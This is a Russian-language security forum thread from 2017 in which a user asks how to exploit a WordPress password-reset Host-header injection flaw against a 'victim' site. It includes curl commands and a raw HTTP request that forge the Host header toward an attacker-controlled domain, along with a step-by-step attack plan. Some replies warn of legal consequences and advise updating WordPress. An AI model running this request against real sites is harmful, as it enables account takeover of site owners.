HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 02.11.2017, 22:28
itprepod
Guest
Сообщений: n/a
Провел на форуме:
1868

Репутация: 0
По умолчанию

Всем привет.

Подскажите как воспользоваться уязвимостью Wordpress, описанной здесь:

https://wpvulndb.com/vulnerabilities/8807

я так понимаю, что это:

curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword

Команда для терминала в линукс?

Что должно быть вместо evil.com ?

вместо example.com сайт жертвы?

или наоборот?

Разъясните пожалуйста.
 
Ответить с цитированием

  #2  
Старый 02.11.2017, 23:17
Dr_Wile
Guest
Сообщений: n/a
Провел на форуме:
45893

Репутация: 2
По умолчанию

Всё верно. Команда вводится в терминал Linux, example.com - сайт жертвы. А вот что это за хост evil.com....

В хелпе curl сказано:

-H, --header LINE Передача пользовательского заголовка LINE на сервер (H)
 
Ответить с цитированием

  #3  
Старый 03.11.2017, 07:01
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от itprepod  
itprepod said:

Команда для терминала в линукс?
cURL кроссплатформенный

Вы вообще понимаете, что эта уязвимость дает и какой код должен быть на вашем сайте (evil.com) для проведения атаки?
 
Ответить с цитированием

  #4  
Старый 03.11.2017, 10:06
itprepod
Guest
Сообщений: n/a
Провел на форуме:
1868

Репутация: 0
По умолчанию

Цитата:
Сообщение от M_script  
M_script said:

cURL кроссплатформенный
Вы вообще понимаете, что эта уязвимость дает и какой код должен быть на вашем сайте (evil.com) для проведения атаки?
Я так понимаю, что с помощью этой уязвимости, можно получить письмо для генерации нового пароля от аккаунта сайта (не важно он с правами админа или нет) на свою почту.

Не знаю какой код должен быть на сайте вместо evil.com, поэтому я здесь.
 
Ответить с цитированием

  #5  
Старый 04.11.2017, 03:00
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от itprepod  
itprepod said:

Я так понимаю, что с помощью этой уязвимости, можно получить письмо для генерации нового пароля от аккаунта сайта (не важно он с правами админа или нет) на свою почту.
С первой попытки не угадали. Попробуйте еще раз.

Цитата:
Сообщение от itprepod  
itprepod said:

Не знаю какой код должен быть на сайте вместо evil.com, поэтому я здесь.
То есть, ничего не знаете, но что-то хотите взломать? А знаете, какой срок дают за то, что вы собираетесь сделать?
 
Ответить с цитированием

  #6  
Старый 04.11.2017, 07:19
brown
Guest
Сообщений: n/a
Провел на форуме:
43449

Репутация: 1
По умолчанию

работа по ру запрещена)
 
Ответить с цитированием

  #7  
Старый 04.11.2017, 09:47
GroM88
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186

Репутация: 2
Отправить сообщение для GroM88 с помощью ICQ
По умолчанию

Цитата:
Сообщение от brown  
brown said:

работа по ру запрещена)
Это было указанно в описании к уязвимости?))
 
Ответить с цитированием

  #8  
Старый 04.11.2017, 18:57
itprepod
Guest
Сообщений: n/a
Провел на форуме:
1868

Репутация: 0
По умолчанию

Цитата:
Сообщение от M_script  
M_script said:

С первой попытки не угадали. Попробуйте еще раз.
То есть, ничего не знаете, но что-то хотите взломать? А знаете, какой срок дают за то, что вы собираетесь сделать?
Я в целях помочь админу в закрытии уязвимости, а не в целях навредить.
 
Ответить с цитированием

  #9  
Старый 06.11.2017, 02:19
itprepod
Guest
Сообщений: n/a
Провел на форуме:
1868

Репутация: 0
По умолчанию

Цитата:
Сообщение от M_script  
M_script said:

С первой попытки не угадали. Попробуйте еще раз.
Или с помощью этой уязвимости можно подменить email админа при заказе письма по восстановлению пароля?

Вот здесь:

https://exploitbox.io/vuln/WordPress...2017-8295.html

Показано, что письмо по восстановлению пароля приходит от wordpress@attackers-mxserver.com

Вместо attackers-mxserver.com может быть любой другой домен.

Но перед атакой получается мне нужно создать почту на домене.

Порядок действий:

1. Регаю домен. Пусть будет forhackwp.ru

2. Делаю почту wordpress@forhackwp.ru

3. Запускаю Линукс. Пишу в терминал:

curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://тут-домен-жертвы/wp-login.php?action=lostpassword

4. Жду письма на свою почту: wordpress@forhackwp.ru ?

Или нет?

Вот тут:

https://exploitbox.io/vuln/WordPress...2017-8295.html

Написано (перевод):

Если злоумышленник отправляет запрос, аналогичный приведенному ниже WordPress по умолчанию

установка, доступная IP-адрес (IP-основе виртуального хоста):

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1

Host: injected-attackers-mxserver.com

Content-Type: application/x-www-form-urlencoded

Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

------------------------

WordPress будет вызвать функцию сброса пароля для учетной записи пользователя с правами администратора.

Из-за измененного заголовка узла имя_сервера будет присвоено значение

имя хоста по выбору злоумышленника.

В результате WordPress передаст следующие заголовки и текст сообщения электронной почты

/usr/bin / обертка sendmail:

------[ полученная электронная почта ]-----

Subject: [CompanyX WP] Password Reset

Return-Path:

From: WordPress

Message-ID:

X-Priority: 3

MIME-Version: 1.0

Content-Type: text/plain; charset=UTF-8

Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin

If this was a mistake, just ignore this email and nothing will happen.

To reset your password, visit the following address:

"]http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login =admin>[/URL]

-------------------------------

Как сделать HTTP запрос?
 
Ответить с цитированием

  #10  
Старый 06.11.2017, 02:48
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию

Цитата:
Сообщение от itprepod  
itprepod said:

Я в целях помочь админу в закрытии уязвимости, а не в целях навредить.
Совета по обновилению WP до последней версии, будет достаточно.

Цитата:
Сообщение от itprepod  
itprepod said:

Или нет?
Нет. Письмо улетит админу, но в линках и заголовках будет домен атакующего.

Так же, должны быть соблюдены условия для успешной эксплуатации.

Цитата:
Сообщение от itprepod  
itprepod said:

Как сделать HTTP запрос?
Цитата:
Сообщение от itprepod  
itprepod said:

curl -H "Host: forhackwp.ru" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password"
http://тут-домен-жертвы/wp-login.php?action=lostpassword
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ